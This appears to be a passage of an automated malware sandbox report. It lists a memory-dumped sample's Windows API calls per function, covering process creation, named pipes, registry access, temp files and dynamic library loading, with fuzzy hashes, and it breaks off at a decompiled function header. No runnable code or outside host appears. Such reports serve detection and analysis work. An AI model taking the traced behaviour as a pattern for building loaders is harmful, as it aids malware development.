                              • HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 0102D9AE
                              • HeapFree.KERNEL32(00000000,?), ref: 0102D9E5
                              • RtlLeaveCriticalSection.NTDLL(00000000), ref: 0102D9F9
                              • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0102DA02
                              • SuspendThread.KERNEL32(?), ref: 0102DA11
                              • CreateEventA.KERNEL32(01050244,00000001,00000000), ref: 0102DA25
                              • SetEvent.KERNEL32(00000000), ref: 0102DA32
                              • CloseHandle.KERNEL32(00000000), ref: 0102DA39
                              • Sleep.KERNEL32(000001F4), ref: 0102DA4C
                              • ResumeThread.KERNEL32(?), ref: 0102DA70
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CloseFreeHeap$CriticalEventHandleSectionThread$CreateDeleteEnterErrorFileLastLeaveOpenResumeSleepSuspend
                              • String ID:
                              • API String ID: 1011176505-0
                              • Opcode ID: 131457605d5ed43f2212752ca3f2cee484d4cb8ae05de60f7fccd20ea82e55c1
                              • Instruction ID: c13591b72cf20958f59180cf3000921fb2d6c6a8674211aadac6fd0a12a115c8
                              • Opcode Fuzzy Hash: 131457605d5ed43f2212752ca3f2cee484d4cb8ae05de60f7fccd20ea82e55c1
                              • Instruction Fuzzy Hash: 504162B6A0021AEFDF609FD8D9C89AEBBBAFB05304B144069F682D3118C73A5D54CF51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • memset.NTDLL ref: 01022E99
                              • StrChrA.SHLWAPI(?,0000000D), ref: 01022EDF
                              • StrChrA.SHLWAPI(?,0000000A), ref: 01022EEC
                              • StrChrA.SHLWAPI(?,0000007C), ref: 01022F13
                              • StrTrimA.SHLWAPI(?,0104C49C), ref: 01022F28
                              • StrChrA.SHLWAPI(?,0000003D), ref: 01022F31
                              • StrTrimA.SHLWAPI(00000001,0104C49C), ref: 01022F47
                              • _strupr.NTDLL ref: 01022F4E
                              • StrTrimA.SHLWAPI(?,?), ref: 01022F5B
                              • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 01022FA3
                              • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,00000001), ref: 01022FC2
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Trim$AllocateHeap_struprlstrlenmemcpymemset
                              • String ID: $;
                              • API String ID: 4019332941-73438061
                              • Opcode ID: 545ea82168199a2173acc2ae7917cd4ccba8d06f28823cb4bf4966208bf8a78b
                              • Instruction ID: 5b6875a871b943835adb3e668b8beb15a576d97337cc17b03d88f0c465f8031f
                              • Opcode Fuzzy Hash: 545ea82168199a2173acc2ae7917cd4ccba8d06f28823cb4bf4966208bf8a78b
                              • Instruction Fuzzy Hash: 4341D0B15043569FE7A1AF6C8D84F6BBBE8AF98200F040869F9D5DB241EB74D5048B62
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • memset.NTDLL ref: 010433B3
                                • Part of subcall function 010334A4: lstrlen.KERNEL32(0102EFEF,747DF560,00000000,?,00000000,0103BF21,?,00000000,?,?,0102EFEF,00000020), ref: 010334B3
                                • Part of subcall function 010334A4: mbstowcs.NTDLL ref: 010334CF
                              • lstrlenW.KERNEL32(00000000,00000000,00000000,77E5DBB0,00000020,00000000), ref: 010433EC
                              • wcstombs.NTDLL ref: 010433F6
                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,77E5DBB0,00000020,00000000), ref: 01043427
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0102DC52), ref: 01043453
                              • TerminateProcess.KERNEL32(?,000003E5), ref: 01043469
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0102DC52), ref: 0104347D
                              • GetLastError.KERNEL32 ref: 01043481
                              • GetExitCodeProcess.KERNEL32(?,00000001), ref: 010434A1
                              • CloseHandle.KERNEL32(?), ref: 010434B0
                              • CloseHandle.KERNEL32(?), ref: 010434B5
                              • GetLastError.KERNEL32 ref: 010434B9
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Process$CloseErrorHandleLastMultipleObjectsWaitlstrlen$CodeCreateExitTerminatembstowcsmemsetwcstombs
                              • String ID: D
                              • API String ID: 2463014471-2746444292
                              • Opcode ID: b00f6c2c2b317200b4df36fb0d2d9535ef4eec563accf75279d71b7b26469fc0
                              • Instruction ID: 3900162555dfe04269b5e1c65125c45017e54671a9a99ba5dad7bd2969601cb4
                              • Opcode Fuzzy Hash: b00f6c2c2b317200b4df36fb0d2d9535ef4eec563accf75279d71b7b26469fc0
                              • Instruction Fuzzy Hash: 3F41EAB9A00128FFEF12EFA4CDC59EEBBBCFB44240F10407AE645A7151DA756E058B61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • StrChrA.SHLWAPI(?,0000002C), ref: 01043FE2
                              • StrTrimA.SHLWAPI(00000001,?), ref: 01043FFB
                              • StrChrA.SHLWAPI(?,0000002C), ref: 01044006
                              • StrTrimA.SHLWAPI(00000001,?), ref: 0104401F
                              • lstrlen.KERNEL32(?), ref: 010440B7
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 010440D9
                              • lstrcpy.KERNEL32(00000020,?), ref: 010440F8
                              • lstrlen.KERNEL32(?), ref: 01044102
                              • memcpy.NTDLL(?,?,?), ref: 01044143
                              • memcpy.NTDLL(?,?,?), ref: 01044156
                              • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 0104417A
                              • HeapFree.KERNEL32(00000000,00000000), ref: 01044199
                              • HeapFree.KERNEL32(00000000,?), ref: 010441BF
                              • HeapFree.KERNEL32(00000000,?), ref: 010441DB
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$Free$Trimlstrlenmemcpy$AllocateSwitchThreadlstrcpy
                              • String ID:
                              • API String ID: 3323474148-0
                              • Opcode ID: f9bf19e82ddf6c772e00aa904e52bffe09dc6e566497d42ddeacca0e59eab275
                              • Instruction ID: 5382f3b518edfbc995c82d9e7a917f996507196eaca62ea71f6f8465255d5ac9
                              • Opcode Fuzzy Hash: f9bf19e82ddf6c772e00aa904e52bffe09dc6e566497d42ddeacca0e59eab275
                              • Instruction Fuzzy Hash: 197158B1204301AFE721DF68D884B5BBBE9BB88304F04492EFAC6D3250D775E554CB92
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(?,?,00000000), ref: 01041D9D
                              • lstrlen.KERNEL32(?,?,00000000), ref: 01041DA4
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 01041DBB
                              • lstrcpy.KERNEL32(00000000,?), ref: 01041DCC
                              • lstrcat.KERNEL32(?,?), ref: 01041DE8
                              • lstrcat.KERNEL32(?,?), ref: 01041DF9
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 01041E0A
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 01041EA7
                              • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,00000000), ref: 01041EE0
                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 01041EF9
                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 01041F03
                              • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 01041F13
                              • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 01041F2C
                              • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 01041F3C
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$AllocateFree$Filelstrcatlstrlen$CloseCreateHandleWritelstrcpy
                              • String ID:
                              • API String ID: 333890978-0
                              • Opcode ID: 669e51c0c5e721362cad1418d0252399c4ddbcce393716000e05cb04df52ce3b
                              • Instruction ID: 452be0f3d3a5a68826119b15e654b1ee3011d20668e20d5bdd006f0c3f3bdd49
                              • Opcode Fuzzy Hash: 669e51c0c5e721362cad1418d0252399c4ddbcce393716000e05cb04df52ce3b
                              • Instruction Fuzzy Hash: E4519CBA500208FFDB219FA8DDC4CAE7BBDFB48344B054065F68597124D73A9A46CF60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • wsprintfA.USER32 ref: 0103FA8D
                              • OpenWaitableTimerA.KERNEL32(00100000,00000000,0102FCCC), ref: 0103FAA0
                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,0102FCCC,00000000,?), ref: 0103FBB8
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • memset.NTDLL ref: 0103FAC3
                              • memcpy.NTDLL(?,000493E0,00000010,?,?,00000040,?,?,?,?,?,?,0102FCCC,00000000,?), ref: 0103FB42
                              • RtlEnterCriticalSection.NTDLL(?), ref: 0103FB57
                              • RtlLeaveCriticalSection.NTDLL(?), ref: 0103FB6F
                              • GetLastError.KERNEL32(01047313,?,?,?,?,?,?,?,00000040,?,?,?,?,?,?,0102FCCC), ref: 0103FB87
                              • RtlEnterCriticalSection.NTDLL(?), ref: 0103FB93
                              • RtlLeaveCriticalSection.NTDLL(?), ref: 0103FBA2
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CriticalSection$EnterLeave$AllocateCloseErrorHandleHeapLastOpenTimerWaitablememcpymemsetwsprintf
                              • String ID: 0x%08X$W
                              • API String ID: 1559661116-2600449260
                              • Opcode ID: fbdad835c89378b46abdc4b27415b7e1c624586079268f445d8efed08be28079
                              • Instruction ID: 6ce76ace2f62eedc4d751a2c900c298630d1eccde8d714d1c0afbbd19931c0a1
                              • Opcode Fuzzy Hash: fbdad835c89378b46abdc4b27415b7e1c624586079268f445d8efed08be28079
                              • Instruction Fuzzy Hash: 1E415CB590020AEFDB21DFA8C984A9EBBFCFF08344F108569F689D7250D3759A44CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlenW.KERNEL32(?,00000000,?,?,?,01025A61,?,?), ref: 01033FF3
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,01025A61,?,?), ref: 0103401C
                              • lstrcpyW.KERNEL32(-0000FFFE,?), ref: 0103403C
                              • lstrcpyW.KERNEL32(-00000002,?), ref: 01034057
                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,01025A61,?,?), ref: 01034063
                              • LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,?,01025A61,?,?), ref: 01034066
                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,01025A61,?,?), ref: 01034072
                              • GetProcAddress.KERNEL32(00000000,?), ref: 0103408F
                              • GetProcAddress.KERNEL32(00000000,?), ref: 010340A9
                              • GetProcAddress.KERNEL32(00000000,?), ref: 010340BF
                              • GetProcAddress.KERNEL32(00000000,?), ref: 010340D5
                              • GetProcAddress.KERNEL32(00000000,?), ref: 010340EB
                              • GetProcAddress.KERNEL32(00000000,?), ref: 01034101
                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,01025A61,?,?), ref: 0103412A
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: AddressProc$CurrentDirectory$Librarylstrcpy$AllocateFreeHeapLoadlstrlen
                              • String ID:
                              • API String ID: 3772355505-0
                              • Opcode ID: 5b758bbabbfb48bb704a4c2a3bd9d0c887fd6be316a54adf9427986ae913e03c
                              • Instruction ID: 51854c46d144d071adf20ab9edd9b89dfcf76f219cfd4d02d02a08e2503e67a4
                              • Opcode Fuzzy Hash: 5b758bbabbfb48bb704a4c2a3bd9d0c887fd6be316a54adf9427986ae913e03c
                              • Instruction Fuzzy Hash: B7312BB160070AEFD7209F65ED84D6B7BECFF44384B044866B985C7215EB7AE804CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlenW.KERNEL32(?,?,00000000,?,?,?,0102F8BF,?,?,?), ref: 010295DC
                              • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,0102F8BF,?,?,?), ref: 010295E7
                              • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,0102F8BF,?,?,?), ref: 010295EF
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 01029604
                              • lstrcpyW.KERNEL32(00000000,?), ref: 01029615
                              • lstrcatW.KERNEL32(00000000,?), ref: 01029627
                              • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,0102F8BF,?,?,?), ref: 0102962C
                              • lstrcatW.KERNEL32(00000000,0104A3F0), ref: 01029638
                              • lstrcatW.KERNEL32(00000000), ref: 01029640
                              • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,0102F8BF,?,?,?), ref: 01029645
                              • lstrcatW.KERNEL32(00000000,0104A3F0), ref: 01029651
                              • lstrcatW.KERNEL32(00000000,00000002), ref: 0102966C
                              • CopyFileW.KERNEL32(?,00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,0102F8BF,?,?,?), ref: 01029674
                              • HeapFree.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,0102F8BF,?,?,?), ref: 01029682
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: lstrcat$lstrlen$CreateDirectoryHeap$AllocateCopyFileFreelstrcpy
                              • String ID:
                              • API String ID: 3635185113-0
                              • Opcode ID: 4c7f40597a6425f6bb165c79be903d266d74de8f4e7446f987d8d234281867d7
                              • Instruction ID: 9ea94083a4dbed25e16a77bebd95b2145c18eb6fa0e325d9d734650c1371e54f
                              • Opcode Fuzzy Hash: 4c7f40597a6425f6bb165c79be903d266d74de8f4e7446f987d8d234281867d7
                              • Instruction Fuzzy Hash: E221DB76280225EFE3316B58DC88E6BBBA8EF89B45F01001DF68283114DB6A9805CB65
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • LoadLibraryA.KERNEL32(?), ref: 0102F415
                              • TlsAlloc.KERNEL32 ref: 0102F41F
                              • LoadLibraryA.KERNEL32(?), ref: 0102F448
                              • LoadLibraryA.KERNEL32(?), ref: 0102F456
                              • LoadLibraryA.KERNEL32(?), ref: 0102F464
                              • LoadLibraryA.KERNEL32(?), ref: 0102F472
                              • LoadLibraryA.KERNEL32(?), ref: 0102F480
                              • LoadLibraryA.KERNEL32(?), ref: 0102F48E
                              • ___HrLoadAllImportsForDll@4.DELAYIMP ref: 0102F4B8
                              • HeapFree.KERNEL32(00000000,?,?,?,0000000C,00000000), ref: 0102F539
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Load$Library$AllocDll@4FreeHeapImports
                              • String ID: ~
                              • API String ID: 1792504554-1707062198
                              • Opcode ID: dbf78c06d3f7ca7795f18cc126fc87471dd279f769af84005bbda1ebc4f0c163
                              • Instruction ID: 3102ed8b064aad162295568fc2ed7a0d1fa75b0aac970ec0b90636edddf4678c
                              • Opcode Fuzzy Hash: dbf78c06d3f7ca7795f18cc126fc87471dd279f769af84005bbda1ebc4f0c163
                              • Instruction Fuzzy Hash: 7441617190022AEFDB20DFA8D9C4D9EBBF8FB08340F0404A6F685D7148DB7AA905CB51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 0102DA7D: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 0102DAC2
                                • Part of subcall function 0102DA7D: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 0102DADA
                                • Part of subcall function 0102DA7D: WaitForSingleObject.KERNEL32(00000000,?,00000000,?,?,?,?,?,010283DE,010395A5,?,00000001), ref: 0102DBA2
                                • Part of subcall function 0102DA7D: HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,010283DE,010395A5,?,00000001), ref: 0102DBCB
                                • Part of subcall function 0102DA7D: HeapFree.KERNEL32(00000000,010283DE,?,00000000,?,?,?,?,?,010283DE,010395A5,?,00000001), ref: 0102DBDB
                                • Part of subcall function 0102DA7D: RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,?,010283DE,010395A5,?,00000001), ref: 0102DBE4
                              • lstrcmp.KERNEL32(?,?), ref: 0102842C
                              • HeapFree.KERNEL32(00000000,?), ref: 01028458
                              • GetCurrentThreadId.KERNEL32 ref: 01028509
                              • GetCurrentThread.KERNEL32 ref: 0102851A
                              • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,010395A5,?,00000001), ref: 01028556
                              • HeapFree.KERNEL32(00000000,?,?,00000000,?,010395A5,?,00000001), ref: 0102856A
                              • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 01028578
                              • wsprintfA.USER32 ref: 01028590
                                • Part of subcall function 010428B5: lstrlen.KERNEL32(?,00000000,01048C1F,?,010212D8,?), ref: 010428BF
                                • Part of subcall function 010428B5: lstrcpy.KERNEL32(00000000,?), ref: 010428E3
                                • Part of subcall function 010428B5: StrRChrA.SHLWAPI(?,00000000,0000002E,?,00000003,?,010212D8,?), ref: 010428EA
                                • Part of subcall function 010428B5: lstrcat.KERNEL32(00000000,?), ref: 01042941
                              • lstrlen.KERNEL32(00000000,00000000), ref: 0102859B
                              • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 010285B2
                              • HeapFree.KERNEL32(00000000,00000000), ref: 010285C3
                              • HeapFree.KERNEL32(00000000,?), ref: 010285CF
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$Free$Allocate$CurrentThreadlstrlen$CloseObjectSingleWaitlstrcatlstrcmplstrcpywsprintf
                              • String ID:
                              • API String ID: 773763258-0
                              • Opcode ID: b2bb1b959638fb974e3afb062a43521a691213198fd9d5670a6b937f6431a48e
                              • Instruction ID: 8c37b4d3f1a439c675a597266d34859749ebcaf73b5389c348f9869565bc66b6
                              • Opcode Fuzzy Hash: b2bb1b959638fb974e3afb062a43521a691213198fd9d5670a6b937f6431a48e
                              • Instruction Fuzzy Hash: 11711875900229EFDB61DF98D884EEEBBF9FF08350F04805AF585A7224D735A945CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0102FB1A
                              • memcpy.NTDLL(?,?,00000010), ref: 0102FB3D
                              • memset.NTDLL ref: 0102FB89
                              • lstrcpyn.KERNEL32(?,?,00000034), ref: 0102FB9D
                              • GetLastError.KERNEL32 ref: 0102FBCB
                              • GetLastError.KERNEL32 ref: 0102FC12
                              • GetLastError.KERNEL32 ref: 0102FC31
                              • WaitForSingleObject.KERNEL32(?,000927C0), ref: 0102FC6B
                              • WaitForSingleObject.KERNEL32(?,00000000), ref: 0102FC79
                              • GetLastError.KERNEL32 ref: 0102FCF3
                              • ReleaseMutex.KERNEL32(?), ref: 0102FD05
                              • RtlExitUserThread.NTDLL(?), ref: 0102FD1B
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: ErrorLast$ObjectSingleWait$ExitMutexReleaseThreadUserlstrcpynmemcpymemset
                              • String ID:
                              • API String ID: 4037736292-0
                              • Opcode ID: e9ea37a0c3de7d9f249f87ef23913efe9221b98dcb14178a01ab00fb27f00025
                              • Instruction ID: 2e8626864c23dab388524d4c4126b8ca9107949ff427f43768558fa7fd83383d
                              • Opcode Fuzzy Hash: e9ea37a0c3de7d9f249f87ef23913efe9221b98dcb14178a01ab00fb27f00025
                              • Instruction Fuzzy Hash: 2561AAB0504306AFD3619F29DA48A1BBBF8BF88750F108A19FAE2C3284D775E504CF52
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(00000000,74785520,?,00000000,?,?,?), ref: 0103BDAA
                              • lstrlen.KERNEL32(?), ref: 0103BDB2
                              • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0103BDC2
                              • lstrcpy.KERNEL32(00000000,?), ref: 0103BDE1
                              • lstrlen.KERNEL32(?), ref: 0103BDF6
                              • lstrlen.KERNEL32(?), ref: 0103BE04
                              • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?), ref: 0103BE52
                              • lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 0103BE76
                              • lstrlen.KERNEL32(?), ref: 0103BEA9
                              • HeapFree.KERNEL32(00000000,?,?), ref: 0103BED4
                              • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 0103BEEB
                              • HeapFree.KERNEL32(00000000,?,?), ref: 0103BEF8
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: lstrlen$Heap$Free$Allocatelstrcpy
                              • String ID:
                              • API String ID: 904523553-0
                              • Opcode ID: 5956f7f2d7ee5a909088db06b8f2ee069f1789807aeb23b4c7830f3dcf34e742
                              • Instruction ID: 4efa24bca55aae0a5a9f5758091e60140125eae7386990073047b4a48c7ae420
                              • Opcode Fuzzy Hash: 5956f7f2d7ee5a909088db06b8f2ee069f1789807aeb23b4c7830f3dcf34e742
                              • Instruction Fuzzy Hash: E5418C7690020AFFDF229FA8CC84AAE7BBAFF84314F104069FA9197150D735E911DB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 01032AE9
                              • WaitForSingleObject.KERNEL32(00000760,00000000), ref: 01032B0B
                              • ConnectNamedPipe.KERNEL32(?,?), ref: 01032B2B
                              • GetLastError.KERNEL32 ref: 01032B35
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 01032B59
                              • FlushFileBuffers.KERNEL32(?,?,00000001,00000000,?,?,00000010,00000000), ref: 01032B9C
                              • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 01032BA5
                              • WaitForSingleObject.KERNEL32(00000000), ref: 01032BAE
                              • CloseHandle.KERNEL32(?), ref: 01032BC3
                              • GetLastError.KERNEL32 ref: 01032BD0
                              • CloseHandle.KERNEL32(?), ref: 01032BDD
                              • RtlExitUserThread.NTDLL(000000FF), ref: 01032BF3
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Wait$CloseErrorHandleLastNamedObjectPipeSingle$BuffersConnectCreateDisconnectEventExitFileFlushMultipleObjectsThreadUser
                              • String ID:
                              • API String ID: 4053378866-0
                              • Opcode ID: 0636687b339093ee667bf6f937ee4773a64de8240c8c4433557f2a668272e711
                              • Instruction ID: 16cc9670bcb4271bfd45bf53f752ca4502f1b00df86e5d8fc4ac620cec1e733e
                              • Opcode Fuzzy Hash: 0636687b339093ee667bf6f937ee4773a64de8240c8c4433557f2a668272e711
                              • Instruction Fuzzy Hash: 7A3162B0544305EFE7219F28C9889AFBBADFB84354F000A29F5D5D20A4D7799A058B52
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlImageNtHeader.NTDLL(00000000), ref: 01042F3F
                              • GetCurrentThreadId.KERNEL32 ref: 01042F55
                              • GetCurrentThread.KERNEL32 ref: 01042F66
                                • Part of subcall function 0103D619: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74785520,?,?,?,01042F93,00000000,?,00000000,010243B5), ref: 0103D62B
                                • Part of subcall function 0103D619: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,01042F93,00000000,?,00000000,010243B5), ref: 0103D644
                                • Part of subcall function 0103D619: GetCurrentThreadId.KERNEL32 ref: 0103D651
                                • Part of subcall function 0103D619: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,01042F93,00000000,?,00000000,010243B5,?,?,?,?,?,010243B5,00000000), ref: 0103D65D
                                • Part of subcall function 0103D619: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,01042F93,00000000,?,00000000,010243B5), ref: 0103D66B
                                • Part of subcall function 0103D619: lstrcpy.KERNEL32(00000000), ref: 0103D68D
                                • Part of subcall function 0102C585: lstrlen.KERNEL32(00000000,00000001,00000000,?,00000000,00000001,00000000,00000000,74785520,00000000,?,01042FAF,00000020,00000000,?,00000000), ref: 0102C5F0
                                • Part of subcall function 0102C585: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000001,00000000,00000000,74785520,00000000,?,01042FAF,00000020,00000000,?,00000000), ref: 0102C618
                              • HeapFree.KERNEL32(00000000,?,00000000,?,?,00000020,00000000,?,00000000,?,00000000,010243B5), ref: 01042FDF
                              • HeapFree.KERNEL32(00000000,?,00000020,00000000,?,00000000,?,00000000,010243B5,?,?,?,?,?,010243B5,00000000), ref: 01042FEB
                              • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 0104303A
                              • wsprintfA.USER32 ref: 01043052
                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,010243B5,00000000), ref: 0104305D
                              • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000,?,?,?,?,?,?,?,?,010243B5,00000000), ref: 01043074
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$Free$CurrentTempThread$FilePathTimelstrlen$AllocateHeaderImageNameSystemlstrcpywsprintf
                              • String ID: W
                              • API String ID: 630447368-655174618
                              • Opcode ID: 988416e66c21cf25cddd36f8b9a608cb22a798ccce4f118bb8b863c5df15d3de
                              • Instruction ID: 6a31d95058513c560a5382de6e006dde6bcc00b0e6727359cd8d1ef8fb802f9a
                              • Opcode Fuzzy Hash: 988416e66c21cf25cddd36f8b9a608cb22a798ccce4f118bb8b863c5df15d3de
                              • Instruction Fuzzy Hash: 48416CB5A00229FBDB219FA5EC88DAF7FB9FF08344F004065F98597118D7369A50DB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RegOpenKeyA.ADVAPI32(80000001,?,00000000), ref: 01032C25
                                • Part of subcall function 0102267F: RegCloseKey.ADVAPI32(?,?,01032C45,00000000,00000000,?), ref: 01022706
                              • RegOpenKeyA.ADVAPI32(80000001,?,00000000), ref: 01032C60
                              • lstrcpyW.KERNEL32(-00000002,?), ref: 01032CC1
                              • lstrcatW.KERNEL32(00000000,?), ref: 01032CD6
                              • lstrcpyW.KERNEL32(?), ref: 01032CF0
                              • lstrcatW.KERNEL32(00000000,?), ref: 01032CFF
                                • Part of subcall function 01039CA7: lstrlenW.KERNEL32(00000000,00000000,?,01032D1E,00000000,?), ref: 01039CBA
                                • Part of subcall function 01039CA7: lstrlen.KERNEL32(?,?,01032D1E,00000000,?), ref: 01039CC5
                                • Part of subcall function 01039CA7: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 01039CDA
                              • RegCloseKey.ADVAPI32(?,?,?,00000000,?), ref: 01032D69
                                • Part of subcall function 010347C6: lstrlenW.KERNEL32(80000001,761506E0,01048A01,80000001,?,?,0102360B,?), ref: 010347D2
                                • Part of subcall function 010347C6: memcpy.NTDLL(00000000,00000002,00000000,00000002,?,?,0102360B,?), ref: 010347FA
                                • Part of subcall function 010347C6: memset.NTDLL ref: 0103480C
                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,00000000,00000000,00000000,?), ref: 01032D9E
                              • GetLastError.KERNEL32 ref: 01032DA9
                              • HeapFree.KERNEL32(00000000,00000000), ref: 01032DBF
                              • RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000,?), ref: 01032DD1
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Closelstrlen$HeapOpenlstrcatlstrcpy$AllocateCreateErrorFileFreeLastmemcpymemset
                              • String ID:
                              • API String ID: 1430934453-0
                              • Opcode ID: adfc05d64178872036117c5c58baf71c3bcc07e6d8a7abcf3f0a43a6e812b3a0
                              • Instruction ID: 7d773a43f040da7d3af4207ddb2127a32b185468cf02310f3f7b6d28fa8586b1
                              • Opcode Fuzzy Hash: adfc05d64178872036117c5c58baf71c3bcc07e6d8a7abcf3f0a43a6e812b3a0
                              • Instruction Fuzzy Hash: 48514D7590021AEBDB21EFA4DD88EEE7BBDFF55340B100565F980D7114D7369A01DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 55%
                              			E013E5D44(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR** _a16, WCHAR** _a20) {
                              				intOrPtr _v8;
                              				intOrPtr _v12;
                              				intOrPtr _v16;
